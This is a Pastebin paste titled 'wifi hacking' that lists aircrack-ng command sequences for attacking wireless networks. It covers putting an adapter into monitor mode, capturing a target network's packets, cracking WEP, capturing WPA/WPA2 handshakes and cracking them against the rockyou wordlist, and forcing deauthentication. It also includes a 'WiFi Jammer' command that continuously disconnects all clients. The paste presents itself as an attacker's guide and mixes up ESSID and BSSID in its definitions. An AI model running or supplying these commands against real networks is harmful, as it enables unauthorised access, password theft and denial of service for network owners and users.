API tools faq
paste
senthilnasa

wifi hacking

senthilnasa
Feb 25th, 2019
78
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.10 KB | None | 0 0
raw download clone embed print report
  1. APTURING WIRELESS COMMUNICATION PACKETS
  2. ==========================================
  3.  
  4. Attacker’s Machine - Kali OS
  5. Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
  6. Tool - Airmon-ng , Airodump-ng (Non-Graphical)
  7.  
  8.  
  9. Modes of Using a Wireless Adapter :
  10.  
  11. # Standard Mode : The mode which basically used by everyone to manage and use the services of a particular Access Point.
  12. # Monitoring Mode : The mode which allows a system with a wireless network interface controller to monitor all traffic received from the wireless network.
  13.  
  14. Command: iwconfig --> to check which mode that wifi adapter is working on
  15.  
  16.  
  17. Tools we will be encountering are :
  18.  
  19. * Airmon-ng : A tool which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone !
  20. Well, that's almost correct. When our network card is in promiscuous mode, it means that it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.
  21.  
  22. Commands:
  23. # iwconfig
  24. # airmon-ng start wlan0
  25. # kill PID (those which might create problem)
  26.  
  27.  
  28. * Airodump-ng : A tool which enables us to capture packets of our specification.This will show us some more information about a perticular wireless network. So lets discuss with some of the keywords.
  29.  
  30. Commands:
  31. # airodump-ng wlan0mon
  32. #
  33.  
  34.  
  35. Terminologies
  36. ==============
  37. Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
  38.  
  39. #Data : Number of captured data packets, including data broadcast packets.
  40.  
  41. #s : Number of data packets per second measure over the last 10 seconds.
  42.  
  43. CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
  44.  
  45. MB : Maximum speed supported by the AP.
  46.  
  47. ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
  48.  
  49. CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
  50.  
  51. AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
  52.  
  53. WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
  54.  
  55. ESSID : THe MAC / Physical Address of the Access Point.
  56.  
  57. BSSID : Name of the Access Point.
  58.  
  59. WEP
  60. ===
  61. #iwconfig
  62. #airmon-ng
  63. #airmon-ng start wlan0
  64. #iwconfig
  65. #airodump-ng wlan0mon
  66. bssid channel number
  67. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  68. Wait until the beacons number reaches to 25,000
  69. #aircrack-ng aranjit-01.cap
  70.  
  71. WPA|WPA2
  72. ========
  73. When there is a new device connecting
  74. -------------------------------------
  75. #iwconfig
  76.  
  77. #airmon-ng
  78. #airmon-ng start wlan0
  79. #iwconfig
  80. #airodump-ng wlan0mon
  81. bssid channel number
  82. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  83. It will help you to get the WPA handshake
  84. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  85.  
  86.  
  87. When there is no new device connecting
  88. -------------------------------------
  89. #iwconfig
  90. #airmon-ng
  91. #airmon-ng start wlan0
  92. #iwconfig
  93. #airodump-ng wlan0mon
  94. bssid channel number
  95. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  96. It will help you to get the WPA handshake
  97. #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
  98. This will make us capture the handshake
  99. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  100.  
  101. WiFi Jammer
  102. ===========
  103. #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
  104.  
  105.  
  106.  
  107.  
  108. ________
  109.  
  110. aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  111.  
  112. -0 means deauthentication
  113. 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
  114. -a 00:14:6C:7E:40:80 is the MAC address of the access point
  115. -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
  116. ath0 is the interface name
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!